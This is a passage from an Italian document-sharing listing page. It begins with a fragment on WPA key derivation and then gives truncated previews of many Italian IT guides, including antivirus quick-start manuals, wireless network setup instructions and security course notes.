(Temporary MIC Key 2x64 bit): Chiave per l'autenticazione Handshake a quattro vie per la derivazione della PTK (Pairwise Transient Key) e della GTK (Group Transient Key), Group Key Handshake per il rinnovo della GTK. La derivazione della PMK (Pairwise Master Key) dipende dal metodo di autenticazione usato: se viene usata una PSK (Pre- Shared Key), PMK = PSK. La Fig. 6: Fase 2: Autenticazione 802.1X 20 hakin9 Nº 2/2006

Networking Wireless con Windows XP

Networking Wireless con Windows XP Networking Wireless con Windows XP Creare una rete wireless AD HOC Clic destro su Risorse del computer e quindi su Proprietà Clic sulla scheda Nome computer e quindi sul pulsante Cambia Digitare il nome

Dettagli

Antivirus Pro 2012. Guida introduttiva

Antivirus Pro 2012. Guida introduttiva Antivirus Pro 2012 Guida introduttiva Importante Sulla custodia del CD sarà possibile trovare il codice di attivazione con il quale attivare il prodotto. Si consiglia di conservarlo in un luogo sicuro.

Dettagli

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Quadro generale: Internet Services Provider (ISP) Server WEB World Wide Web Rete ad alta

Dettagli

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Sommario F-Secure Anti-Virus for Mac 2015 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Gestione abbonamento...4 1.2 Come verificare che il computer sia protetto...4

Dettagli

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido ESET NOD32 Antivirus 4 per Linux Desktop Guida all'avvio rapido ESET NOD32 Antivirus 4 fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

RIPETITORE WIRELESS N 300MBPS

RIPETITORE WIRELESS N 300MBPS RIPETITORE WIRELESS N 300MBPS Guida rapida all'installazione DN-70181 Introduzione: DN-70181 e un ripetitore Wi-Fi con una combinazione dispositivo di connessione di rete cablato/wireless progettato specificamente

Dettagli

Internet Security 2012

Internet Security 2012 Internet Security 2012 Guida introduttiva Importante Sulla custodia del CD sarà possibile trovare il codice di attivazione con il quale attivare il prodotto. Si consiglia di conservarlo in un luogo sicuro.

Dettagli

per Mac Guida all'avvio rapido

per Mac Guida all'avvio rapido per Mac Guida all'avvio rapido ESET Cybersecurity fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense introdotto per la prima volta

Dettagli

Capitolo 1: Operazioni preliminari...3

Capitolo 1: Operazioni preliminari...3 F-Secure Anti-Virus for Mac 2014 Sommario 2 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Operazioni da effettuare in seguito all'installazione...4 1.1.1 Gestione abbonamento...4 1.1.2 Come aprire

Dettagli

Guida di rete. Configurazione di Windows Utilizzo di un server di stampa Monitoraggio e configurazione della stampante Appendice

Guida di rete. Configurazione di Windows Utilizzo di un server di stampa Monitoraggio e configurazione della stampante Appendice Guida di rete 1 2 3 4 Configurazione di Windows Utilizzo di un server di stampa Monitoraggio e configurazione della stampante Appendice Si prega di leggere attentamente questo manuale prima di utilizzare

Dettagli

Corso di Informatica

Corso di Informatica Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet

Dettagli

ESET CYBER SECURITY per Mac Guida all avvio rapido. Fare clic qui per scaricare la versione più recente di questo documento

ESET CYBER SECURITY per Mac Guida all avvio rapido. Fare clic qui per scaricare la versione più recente di questo documento ESET CYBER SECURITY per Mac Guida all avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Cyber Security fornisce una protezione del computer all'avanguardia contro

Dettagli

Junos Pulse per BlackBerry

Junos Pulse per BlackBerry Junos Pulse per BlackBerry Guida utente Versione 4.0 Giugno 2012 R1 Copyright 2012, Juniper Networks, Inc. Juniper Networks, Junos, Steel-Belted Radius, NetScreen e ScreenOS sono marchi registrati di Juniper

Dettagli

IT Security 3 LA SICUREZZA IN RETE

IT Security 3 LA SICUREZZA IN RETE 1 IT Security 3 LA SICUREZZA IN RETE Una RETE INFORMATICA è costituita da un insieme di computer collegati tra di loro e in grado di condividere sia le risorse hardware (stampanti, Hard Disk,..), che le

Dettagli

Come si può notare ogni richiesta ICMP Echo Request va in timeout in

Come si può notare ogni richiesta ICMP Echo Request va in timeout in Comandi di rete Utility per la verifica del corretto funzionamento della rete: ICMP Nelle procedure viste nei paragrafi precedenti si fa riferimento ad alcuni comandi, come ping e telnet, per potere verificare

Dettagli

Uso di Avast Free 7.01

Uso di Avast Free 7.01 Uso di Avast Free 7.01 Abbastanza simile alla precedente versione e ovviamente sempre in lingua italiana, Avast Free 7.01 creato da Avast Software, ha un ottima fama fra le soluzioni anti-malware gratuite:

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS ROUTER WIRELESS A BANDA LARGA 11N 300MBPS Guida all'installazione rapida DN-70591 INTRODUZIONE DN-70591 è un dispositivo combinato wireless/cablato progettato in modo specifico per i requisiti di rete

Dettagli

User Manual Version 3.6 Manuale dell utente - Versione 2.0.0.0

User Manual Version 3.6 Manuale dell utente - Versione 2.0.0.0 User Manual Version 3.6 Manuale dell utente - Versione 2.0.0.0 User Manuale Manual dell utente I EasyLock Manuale dell utente Sommario 1. Introduzione... 1 2. Requisiti di Sistema... 2 3. Installazione...

Dettagli

Pratica guidata 10. Attivare misura di sicurezza per il computer. Microsoft Security Essentials e il Firewall di Windows 7

Pratica guidata 10. Attivare misura di sicurezza per il computer. Microsoft Security Essentials e il Firewall di Windows 7 Pratica guidata 10 Attivare misura di sicurezza per il computer Microsoft Security Essentials e il Firewall di Windows 7 Centro Servizi Regionale Pane e Internet Redazione a cura di Roger Ottani, Grazia

Dettagli

Retrospect 9 per Mac Appendice al Manuale per l'utente

Retrospect 9 per Mac Appendice al Manuale per l'utente Retrospect 9 per Mac Appendice al Manuale per l'utente 2 Retrospect 9 Manuale dell'utente Appendice www.retrospect.com 2011 Retrospect, Inc. Tutti i diritti riservati. Manuale per l'utente Retrospect 9,

Dettagli

Manuale di Attivazione. Edizione 2007

Manuale di Attivazione. Edizione 2007 Manuale di Attivazione Edizione 2007 Manuale attivazione PaschiInAzienda - 2007 INDICE 1. Requisiti preliminari 3 2. Dati per l accesso al servizio 3 3. Istruzioni per l attivazione del servizio 5 3.1.

Dettagli

Modulo 12 Sicurezza informatica

Modulo 12 Sicurezza informatica Modulo 12 Sicurezza informatica Il presente modulo definisce i concetti e le competenze fondamentali per comprendere l uso sicuro dell ICT nelle attività quotidiane e per utilizzare tecniche e applicazioni

Dettagli

Guida in linea di Symantec pcanywhere Web Remote

Guida in linea di Symantec pcanywhere Web Remote Guida in linea di Symantec pcanywhere Web Remote Connessione da un browser Web Il documento contiene i seguenti argomenti: Informazioni su Symantec pcanywhere Web Remote Metodi per la protezione della

Dettagli

Uso di Avast Free 8.01

Uso di Avast Free 8.01 Uso di Avast Free 8.01 Rispetto alla precedente versione, Avast Free 8.01, creato da Avast Software, ha introdotto rilevanti modifiche nell interfaccia utente, mantenendo comunque inalterata la sua ottima

Dettagli

Indice generale. Introduzione...xiii. Nota del revisore...xvii. Introduzione alle reti...1. Introduzione alle reti wireless...11

Indice generale. Introduzione...xiii. Nota del revisore...xvii. Introduzione alle reti...1. Introduzione alle reti wireless...11 Introduzione...xiii Nota del revisore...xvii Capitolo 1 Capitolo 2 Introduzione alle reti...1 Trasferimento di dati... 2 Bit e byte... 2 Controllo di errore... 3 Handshaking... 3 Trovare la destinazione...

Dettagli

Manuale d uso. rev. 270406

Manuale d uso. rev. 270406 Manuale d uso istudio rev. 270406 1 Indice Capitolo 1: istudio il convertitore di film e musica per ipod Capitolo 2: Primi passi Come fare per...5 Installazione...5 Capitolo 3: Usare istudio Impostazioni...7

Dettagli

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alla rete WiFi INSUBRIA CAMPUS STUDENTI Configurazione

Dettagli

ESET NOD32 ANTIVIRUS 7

ESET NOD32 ANTIVIRUS 7 ESET NOD32 ANTIVIRUS 7 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

Il Centro sicurezza PC di Windows Vista Introduzione alla sicurezza

Il Centro sicurezza PC di Windows Vista Introduzione alla sicurezza Il Centro sicurezza PC di Windows Vista Introduzione alla sicurezza Usa gli strumenti per la vita digitale Negli ultimi anni l aspetto della sicurezza è diventato sempre più importante, la maggior parte

Dettagli

PATENTE EUROPEA DEL COMPUTER 4.0 MODULO

PATENTE EUROPEA DEL COMPUTER 4.0 MODULO PATENTE EUROPEA DEL COMPUTER 4.0 MODULO 2 Uso del Computer e Gestione dei file ( Windows XP ) A cura di Mimmo Corrado MODULO 2 - USO DEL COMPUTER E GESTIONE DEI FILE 2 FINALITÁ Il Modulo 2, Uso del computer

Dettagli

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alle reti WiFi dotate di WEB captive portal INSURIA-ATENO,

Dettagli

ESET NOD32 ANTIVIRUS 6

ESET NOD32 ANTIVIRUS 6 ESET NOD32 ANTIVIRUS 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET NOD32 Antivirus offre una protezione

Dettagli

Guida all'installazione (Italiano) Primi passi

Guida all'installazione (Italiano) Primi passi Primi passi Guida all'installazione (Italiano) Siamo lieti che Lei abbia deciso di acquistare il nostro prodotto e speriamo che resterà pienamente soddisfatto del suo nuovo software. In caso di problemi

Dettagli

ESET SMART SECURITY 9

ESET SMART SECURITY 9 ESET SMART SECURITY 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Smart Security è un software di

Dettagli

Usa ESET NOD32 Antivirus 8 per ottenere una protezione totale del tuo computer.

Usa ESET NOD32 Antivirus 8 per ottenere una protezione totale del tuo computer. Leggero, potente e facile da usare Il motore antivirus e antispyware ThreatSense di NOD32 garantisce la protezione del tuo computer usando un quantitativo di risorse molto ridotto, vigilando sulla sicurezza

Dettagli

Sophos Endpoint Security and Control Guida di avvio per computer autonomi

Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control versione 9 Sophos Anti-Virus per Mac OS X, versione 7 Data documento: ottobre 2009 Sommario

Dettagli

Retrospect 10 per Mac Appendice alla Guida per l'utente

Retrospect 10 per Mac Appendice alla Guida per l'utente Retrospect 10 per Mac Appendice alla Guida per l'utente 2 Appendice alla Guida per l'utente di Retrospect 10 www.retrospect.com 2012 Retrospect Inc. Tutti i diritti riservati. Guida per l'utente di Retrospect

Dettagli

Servizio di accesso alla rete wireless della Facoltà di Ingegneria ( note utenti )

Servizio di accesso alla rete wireless della Facoltà di Ingegneria ( note utenti ) Home Note Windows Note Mac Note Linux Punti accesso Servizio di accesso alla rete wireless della Facoltà di Ingegneria ( note utenti ) E stato abilitato (ancora in via sperimentale) l accesso wireless

Dettagli

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente Programma Introduzione a Windows XP Professional Esplorazione delle nuove funzionalità e dei miglioramenti Risoluzione dei problemi mediante Guida in linea e supporto tecnico Gruppi di lavoro e domini

Dettagli

ARGOSAVE 3.0.0. Argo Software srl Zona Industriale III Fase 97100 Ragusa tel 0932.666412 fax 0932.667551- www.argosoft.it info@argosoft.

ARGOSAVE 3.0.0. Argo Software srl Zona Industriale III Fase 97100 Ragusa tel 0932.666412 fax 0932.667551- www.argosoft.it info@argosoft. INDICE 1 Il sistema ArgoSave 1.1 Caratteristiche 1.2 Organizzazione del sistema 2 Installazione 3 Il pannello di controllo 3.1 Opzioni generali 3.2 Opzioni di backup giornaliero 3.3 Opzioni di backup via

Dettagli

SICUREZZA. Sistemi Operativi. Sicurezza

SICUREZZA. Sistemi Operativi. Sicurezza SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1 SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

IRISPen Air 7. Guida rapida per l uso. (Windows & Mac OS X)

IRISPen Air 7. Guida rapida per l uso. (Windows & Mac OS X) IRISPen Air 7 Guida rapida per l uso (Windows & Mac OS X) La Guida rapida per l'uso viene fornita per aiutarvi a iniziare a usare IRISPen Air TM 7. Leggere la guida prima di utilizzare lo scanner e il

Dettagli

Dove installare GFI EventsManager sulla rete?

Dove installare GFI EventsManager sulla rete? Installazione Introduzione Dove installare GFI EventsManager sulla rete? GFI EventsManager può essere installato su qualsiasi computer che soddisfi i requisiti minimi di sistema, indipendentemente dalla

Dettagli

Guida introduttiva di F-Secure PSB

Guida introduttiva di F-Secure PSB Guida introduttiva di F-Secure PSB Guida introduttiva di F-Secure PSB Indice generale 3 Sommario Capitolo 1: Introduzione...5 Capitolo 2: Guida introduttiva...7 Creazione di un nuovo account...8 Come

Dettagli

Guida di Pro PC Secure

Guida di Pro PC Secure 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) INFORMAZIONI AGGIUNTIVE 1) SOMMARIO Guida di Pro PC Secure Pro PC Secure è un programma che si occupa della protezione dagli attacchi provenienti

Dettagli

DIFENDIAMO LA NOSTRA WLAN

DIFENDIAMO LA NOSTRA WLAN DIFENDIAMO LA NOSTRA WLAN Scritto da Matteo Giardino Le WLAN (Wireless Local Area Network) sono tutte quelle reti dove gli hosts (ovvero i computer che fanno parte della rete) sono collegati fra di loro

Dettagli

NUOVO Panda Antivirus 2007 Guida introduttiva Importante! Leggere attentamente la sezione Registrazione online della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire

Dettagli

Manuale di Desktop Sharing. Brad Hards Traduzione: Luciano Montanaro Traduzione: Daniele Micci

Manuale di Desktop Sharing. Brad Hards Traduzione: Luciano Montanaro Traduzione: Daniele Micci Brad Hards Traduzione: Luciano Montanaro Traduzione: Daniele Micci 2 Indice 1 Introduzione 5 2 Il protocollo Remote Frame Buffer 6 3 Uso di Desktop Sharing 7 3.1 Gestione degli inviti di Desktop Sharing.........................

Dettagli

su Windows XP con schede Cisco Aironet 350

su Windows XP con schede Cisco Aironet 350 su Windows XP con schede Cisco Aironet 350 WIFE è il servizio gratuito per l'accesso wireless a Internet. Tutti gli studenti in possesso di un computer portatile possono accedere alla rete Internet mediante

Dettagli

Guida introduttiva Antivirus Pro 2009 Importante Leggere attentamente la sezione Attivazione del prodotto della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire

Dettagli

ESET SMART SECURITY 8

ESET SMART SECURITY 8 ESET SMART SECURITY 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

Configurare una rete con PC Window s 98

Configurare una rete con PC Window s 98 Configurare una rete con PC Window s 98 In estrema sintesi, creare una rete di computer significa: realizzare un sistema di connessione tra i PC condividere qualcosa con gli altri utenti della rete. Anche

Dettagli

BavInAzienda. Manuale di Attivazione. Edizione Maggio 2010

BavInAzienda. Manuale di Attivazione. Edizione Maggio 2010 BavInAzienda Manuale di Attivazione Edizione Maggio 2010 Manuale Attivazione BavInAzienda - Maggio 2010 INDICE 1. Requisiti preliminari 3 2. Dati per l accesso al servizio 3 3. Istruzioni per l attivazione

Dettagli

GFI LANguard 9. Guida introduttiva. A cura di GFI Software Ltd.

GFI LANguard 9. Guida introduttiva. A cura di GFI Software Ltd. GFI LANguard 9 Guida introduttiva A cura di GFI Software Ltd. http://www.gfi.com E-mail: info@gfi.com Le informazioni contenute nel presente documento sono soggette a modifiche senza preavviso. Salvo se

Dettagli

1) Reti di calcolatori. Una rete locale di computer (Local Area Network) è costituita da computer collegati tramite cavi di

1) Reti di calcolatori. Una rete locale di computer (Local Area Network) è costituita da computer collegati tramite cavi di 1) Reti di calcolatori 2) Internet 3) Sicurezza LAN 1) Reti di calcolatori Una rete locale di computer (Local Area Network) è costituita da computer collegati tramite cavi di rete (cavi UTP) o con tecnologia

Dettagli

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS KASPERSKY FRAUD PREVENTION FOR ENDPOINTS www.kaspersky.com KASPERSKY FRAUD PREVENTION 1. Modi di attacco ai servizi bancari online Il motivo principale alla base del cybercrimine è quello di ottenere denaro

Dettagli

Xerox. Print Advisor Domande frequenti

Xerox. Print Advisor Domande frequenti Print Advisor Generali D. Che cos'è Print Advisor? R. Print Advisor è uno strumento software che tutti i clienti ColorQube 9200 possono scaricare e installare. I vantaggi principali di Print Advisor sono:

Dettagli

Come creare una rete domestica con Windows XP

Come creare una rete domestica con Windows XP Lunedì 13 Aprile 2009 - ore: 12:49 Pagina Reti www.google.it www.virgilio.it www.tim.it www.omnitel.it Come creare una rete domestica con Windows XP Introduzione Una rete locale (LAN,

Dettagli

su Windows XP con schede D-Link DWL 650+

su Windows XP con schede D-Link DWL 650+ su Windows XP con schede D-Link DWL 650+ WIFE è il servizio gratuito per l'accesso wireless a Internet. Tutti gli studenti in possesso di un computer portatile possono accedere alla rete Internet mediante

Dettagli

Sygate 5.5 Freeware : Guida all'uso

Sygate 5.5 Freeware : Guida all'uso Sygate 5.5 Freeware : Guida all'uso Per l'utente medio esistono molte scelte in tema di firewall e Sygate 5.5 free è un programma da prendere in seria considerazione perché è semplice da utilizzare e una

Dettagli

Internet gratuita in Biblioteca e nei dintorni

Internet gratuita in Biblioteca e nei dintorni Internet gratuita in Biblioteca e nei dintorni Per la navigazione è necessaria l iscrizione preventiva in Biblioteca, sia al Servizio Bibliotecario sia a quello internet Per poter accedere a Internet tramite

Dettagli

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link Sicurezza ai livelli di rete e data link Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione può essere introdotto anche ai livelli inferiori dello stack 2 Sicurezza

Dettagli

Perché abbiamo problemi di sicurezza? Sicurezza. Reti di calcolatori. 2001-2007 Pier Luca Montessoro (si veda la nota di copyright alla slide n.

Perché abbiamo problemi di sicurezza? Sicurezza. Reti di calcolatori. 2001-2007 Pier Luca Montessoro (si veda la nota di copyright alla slide n. RETI DI CALCOLATORI Prof. PIER LUCA MONTESSORO Facoltà di Ingegneria Università degli Studi di Udine 2001-2007 Pier Luca Montessoro (si veda la nota a pagina 2) 1 Nota di Copyright Questo insieme di trasparenze

Dettagli

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE LE MINACCE I rischi della rete (virus, spyware, adware, keylogger, rootkit, phishing, spam) Gli attacchi per mezzo di software non aggiornato La tracciabilità dell indirizzo IP pubblico. 1 LE MINACCE I

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

LW153 Sweex Wireless 150N Adapter USB

LW153 Sweex Wireless 150N Adapter USB LW153 Sweex Wireless 150N Adapter USB Attenzione! Sul CD-ROM accluso è disponibile il Setup Wizard, l installazione guidata. La facile procedura di installazione, mostrerà come configurare il adapter passo

Dettagli

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Microsoft Windows è il sistema operativo più diffuso, ma paradossalmente è anche quello meno sicuro.

Dettagli

Implicazioni sociali dell informatica

Implicazioni sociali dell informatica Fluency Implicazioni sociali dell informatica Capitolo 10 Privacy I nostri corpi I nostri luoghi Le informazioni Le comunicazioni personali La privacy Con i moderni dispositivi è possibile violare la privacy

Dettagli

Windows Live OneCare Introduzione e installazione

Windows Live OneCare Introduzione e installazione Windows Live OneCare Introduzione e installazione La sicurezza e la manutenzione del proprio computer è di fondamentale importanza per tenerlo sempre efficiente e al riparo dalle minacce provenienti dalla

Dettagli

SIEMENS GIGASET SX763 GUIDA ALL INSTALLAZIONE

SIEMENS GIGASET SX763 GUIDA ALL INSTALLAZIONE SIEMENS GIGASET SX763 GUIDA ALL INSTALLAZIONE Siemens Gigaset SX763 Guida all installazione EUTELIAVOIP Rev1-0 pag.2 INDICE COSA E IL SIEMENS SX763...3 IL CONTENUTO DELLA SCATOLA DEL SIEMENS SX763...4

Dettagli

Client Avaya Modular Messaging per Microsoft Outlook versione 5.0

Client Avaya Modular Messaging per Microsoft Outlook versione 5.0 Client Avaya Modular Messaging per Microsoft Outlook versione 5.0 Importante: le istruzioni all'interno di questa guida sono applicabili solamente nel caso in cui l'archivio di messaggi sia Avaya Message

Dettagli

Tutto il meglio di BecomeGeek - Giugno 2009. Ecco come eliminare la pubblicità da Msn Messenger

Tutto il meglio di BecomeGeek - Giugno 2009. Ecco come eliminare la pubblicità da Msn Messenger Tutto il meglio di BecomeGeek - Giugno 2009 Ecco come eliminare la pubblicità da Msn Messenger Oggi quasi tutti i servizi di messaggistica istantanea, come ad esempio Msn Messenger o Yahoo Messenger, fanno

Dettagli

NVIDIA GeForce Experience

NVIDIA GeForce Experience NVIDIA GeForce Experience DU-05620-001_v02 ottobre 9, 2012 Guida dell'utente SOMMARIO 1 NVIDIA GeForce Experience Guida dell'utente... 1 Informazioni su GeForce Experience... 1 Installazione e impostazione

Dettagli

EM4576/EM4578 - Scheda di rete wireless USB

EM4576/EM4578 - Scheda di rete wireless USB EM4576/EM4578 - Scheda di rete wireless USB 2 ITALIANO EM4576/EM4578 - Scheda di rete wireless USB Avvertenze ed elementi cui necessita prestare attenzione In virtù delle leggi, delle direttive e dei regolamenti

Dettagli

INDICE PROGRAMMA CORSO

INDICE PROGRAMMA CORSO INDICE PROGRAMMA CORSO PRIMA LEZIONE: Componenti di un computer: Hardware, Software e caratteristiche delle periferiche. SECONDA LEZIONE: Elementi principali dello schermo di Windows: Desktop, Icone, Mouse,

Dettagli

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Configurazione con Sistema Operativo Microsoft Windows XP Requisiti di sistema

Dettagli

Nota: E' necessario che il sistema possa fare il boot da CD per effettuare l'installazione.

Nota: E' necessario che il sistema possa fare il boot da CD per effettuare l'installazione. Questa guida mostra come convertire un normale PC in un server Untangle utilizzando un CD di installazione Untangle. Che cosa sa fare il Server Untangle? Il server Untangle offre un modo semplice per proteggere,

Dettagli

Man In The Middle & SSL Attack

Man In The Middle & SSL Attack Man In The Middle & SSL Attack Autore: Duffabio Provenienza: http://duffabio.altervista.org/ Ringrazio BlackLight perchè per la teoria mi sono basato sulle sue guide visto che è da li che ho studiato la

Dettagli

Gestione del database Gidas

Gestione del database Gidas Gestione del database Gidas Manuale utente Aggiornamento 20/06/2013 Cod. SWUM_00535_it Sommario 1. Introduzione... 3 2. Requisiti e creazione del Database Gidas... 3 2.1.1. SQL Server... 3 2.1.2. Requisiti

Dettagli

Posta Elettronica con Microsoft Outlook Express II

Posta Elettronica con Microsoft Outlook Express II Posta Elettronica con Microsoft Outlook Express - II Posta Elettronica con Microsoft Outlook Express II 1. Avvio di MS Outlook Express 2. Ricezione di messaggi di posta 3. Invio di messaggi di posta 4.

Dettagli

Proteggi ciò che crei. Guida all avvio rapido

Proteggi ciò che crei. Guida all avvio rapido Proteggi ciò che crei Guida all avvio rapido 1 Documento aggiornato il 10.06.2013 Tramite Dr.Web CureNet! si possono eseguire scansioni antivirali centralizzate di una rete locale senza installare il programma

Dettagli

Importante! Leggere attentamente la sezione Attivazione dei servizi della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire la protezione del PC. MEGA DETECTION

Dettagli

su Windows XP con schede Cisco Aironet 350

su Windows XP con schede Cisco Aironet 350 su Windows XP con schede Cisco Aironet 350 WIFE è il servizio gratuito per l'accesso wireless a Internet. Tutti gli studenti in possesso di un computer portatile possono accedere alla rete Internet mediante

Dettagli

Guida d installazione rapida

Guida d installazione rapida V38.01 IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) FI8909/FI8909W ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione rapida Lista d imballaggio 1) IP CAMERA

Dettagli

GUIDA ALLA CONFIGURAZIONE DI ZONE ALARM PERSONAL FIREWALL

GUIDA ALLA CONFIGURAZIONE DI ZONE ALARM PERSONAL FIREWALL GUIDA ALLA CONFIGURAZIONE DI ZONE ALAR M PERSONAL FIREWALL 6.1 Zone Alarm personal Firewall è la versione gratuita, per uso personale, del più completo Zone Alarm Pro, firewall prodotto da Zone Labs. Questa

Dettagli

unità di misura usata in informatica

unità di misura usata in informatica APPUNTI PER UTILIZZARE WINDOWS SENZA PROBLEMI a cura del direttore amm.vo dott. Nicola Basile glossario minimo : terminologia significato Bit unità di misura usata in informatica byte Otto bit Kilobyte

Dettagli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE - CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE Di cosa parleremo Definizioni di virus e malware. Danni che i virus possono provocare. Rimedi che possiamo applicare.

Dettagli

Sistema Informativo Sanitario Territoriale

Sistema Informativo Sanitario Territoriale Sistema Informativo Sanitario Territoriale MANUALE KIT ACTALIS CNS Versione 1.0 Dicembre 2009 Innova S.p.A. Pag 1 di 34 Indice 1. SCOPO DEL MANUALE... 3 2. REQUISITI DI SISTEMA... 3 3. ACTALIS KIT CNS

Dettagli

2 Dipendenza da Internet 6 2.1 Tipi di dipendenza... 6 2.2 Fasi di approccio al Web... 6 2.3 Fine del corso... 7

2 Dipendenza da Internet 6 2.1 Tipi di dipendenza... 6 2.2 Fasi di approccio al Web... 6 2.3 Fine del corso... 7 Sommario Indice 1 Sicurezza informatica 1 1.1 Cause di perdite di dati....................... 1 1.2 Protezione dei dati.......................... 2 1.3 Tipi di sicurezza........................... 3 1.4

Dettagli

Proteggi gli account personali

